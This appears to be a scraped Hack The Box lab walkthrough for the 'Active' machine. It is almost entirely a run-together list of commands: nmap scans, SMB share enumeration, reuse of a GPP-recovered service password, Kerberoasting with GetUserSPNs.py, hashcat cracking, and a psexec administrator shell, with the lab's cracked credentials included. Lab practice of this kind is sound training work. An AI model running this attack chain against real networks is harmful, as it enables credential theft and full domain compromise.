HTB | Active
Skill Learned
NMAP
nmap -sT -p- --min-rate 10000 10.10.10.100

SMB - TCP 139/445



Foothold/shell

GPP Passwords




Priv Esc






Last updated
nmap -sT -p- --min-rate 10000 10.10.10.100















Last updated
nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,49152-49158,49165-49168 10.10.10.100enum4linux -a 10.10.10.100smbclient //10.10.10.100/Replication -Nsmbmap -H 10.10.10.100 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18smbclient //10.10.10.100/Users -U active.htb\SVC_TGS%GPPstillStandingStrong2k18GetUserSPNs.py active.htb/SVC_TGS:'GPPstillStandingStrong2k18' -dc-ip 10.10.10.100 -requesthashcat -m 13100 -a 0 GetUserSPNs.out /home/anurag/Downloads/rockyou.txt --forcesmbmap -H 10.10.10.100 -d active.htb -u administrator -p Ticketmaster1968psexec.py administrator:'Ticketmaster1968'@10.10.10.100smbclient //10.10.10.100/C$ -U active.htb\administrator%Ticketmaster1968